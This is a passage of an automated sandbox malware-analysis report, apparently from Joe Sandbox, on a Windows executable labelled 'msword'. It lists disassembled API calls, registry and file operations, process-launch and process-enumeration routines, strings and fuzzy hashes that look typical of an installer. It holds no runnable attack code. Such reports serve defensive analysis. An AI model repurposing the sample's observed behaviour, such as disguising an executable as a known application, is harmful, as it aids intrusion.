                                                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                    • GetSysColor.USER32(?), ref: 004041AF
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                    • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                    • SendMessageW.USER32(00000000), ref: 00404251
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                    • SetCursor.USER32(00000000), ref: 004042D2
                                                                    • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                    • SetCursor.USER32(00000000), ref: 004042F6
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                    • String ID: @%F$N$open
                                                                    APIs
                                                                    • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                    • wsprintfA.USER32 ref: 00406B4D
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                    • String ID: F$%s=%s$NUL$[Rename]
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010D8
• FillRect.USER32(00000000,?,00000000), ref: 004010ED
• DeleteObject.GDI32(?), ref: 004010F6
• CreateFontIndirectW.GDI32(?), ref: 0040110E
• SetBkMode.GDI32(00000000,00000001), ref: 0040112F
• SetTextColor.GDI32(00000000,000000FF), ref: 00401139
• SelectObject.GDI32(00000000,?), ref: 00401149
• DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
• SelectObject.GDI32(00000000,00000000), ref: 00401169
• DeleteObject.GDI32(?), ref: 0040116E
• EndPaint.USER32(?,?), ref: 00401177
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
APIs
• RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
• lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
• RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
• RegCloseKey.ADVAPI32(?), ref: 004029E4
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Strings
• WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
• WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
• WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
• WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
• WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
• WriteReg: error creating key "%s\%s", xrefs: 004029F5
Similarity
• API ID: lstrlen$CloseCreateValuewvsprintf
• String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
• API String ID: 1641139501-220328614
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
• GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
• WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
• GlobalFree.KERNEL32(00000000), ref: 00402F17
• CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
• DeleteFileW.KERNEL32(?), ref: 00402F56
Strings
• created uninstaller: %d, "%s", xrefs: 00402F3B
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID: created uninstaller: %d, "%s"
• API String ID: 3294113728-3145124454
APIs
• CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
• GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
• WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
• lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
• WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
Strings
Similarity
• API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
• String ID: RMDir: RemoveDirectory invalid input("")
• API String ID: 3734993849-2769509956
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
• GetSysColor.USER32(00000000), ref: 00403E00
• SetTextColor.GDI32(?,00000000), ref: 00403E0C
• SetBkMode.GDI32(?,?), ref: 00403E18
• GetSysColor.USER32(?), ref: 00403E2B
• SetBkColor.GDI32(?,?), ref: 00403E3B
• DeleteObject.GDI32(?), ref: 00403E55
• CreateBrushIndirect.GDI32(?), ref: 00403E5F
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
APIs
• GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
• FreeLibrary.KERNEL32(?,?), ref: 004024C3
Strings
• Error registering DLL: Could not load %s, xrefs: 004024DB
• Error registering DLL: %s not found in %s, xrefs: 0040249A
• Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Similarity
• API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
• String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
• API String ID: 1033533793-945480824
APIs
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
• GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
Strings
• Exec: failed createprocess ("%s"), xrefs: 004022C2
• Exec: command="%s", xrefs: 00402241
• Exec: success ("%s"), xrefs: 00402263
Memory Dump Source
• Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msword.jbxd
Similarity
• API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
• String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
• API String ID: 2014279497-3433828417
• Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
• Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
• Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
• Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
• GetMessagePos.USER32 ref: 00404871
• ScreenToClient.USER32(?,?), ref: 00404889
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
Strings
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
• Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
• Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
• Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
• MulDiv.KERNEL32(00015600,00000064,?), ref: 00403295
• wsprintfW.USER32 ref: 004032A5
• SetWindowTextW.USER32(?,?), ref: 004032B5
• SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
Strings
• verifying installer: %d%%, xrefs: 0040329F
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
• Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
• Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
• Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
APIs
• lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
• wsprintfW.USER32 ref: 00404457
• SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
Strings
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$@rD
• API String ID: 3540041739-1813061909
• Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
• Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
• Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
• Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
• CharNextW.USER32(?,?,?,00000000), ref: 004060AA
• CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
• CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
Strings
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
• Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
• Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
• Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
• Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
• Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
• Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
APIs
• GetDlgItem.USER32(?), ref: 004020A3
• GetClientRect.USER32(00000000,?), ref: 004020B0
• LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
• DeleteObject.GDI32(00000000), ref: 004020EE
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
• Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
• Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
• Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
Strings
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                    APIs
                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                    • API String ID: 1697273262-1764544995
                                                                    • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                    • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                    • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                    • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00404902
                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID: $@rD
                                                                    • API String ID: 3748168415-881980237
                                                                    • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                    • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                    • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                    • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                      • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
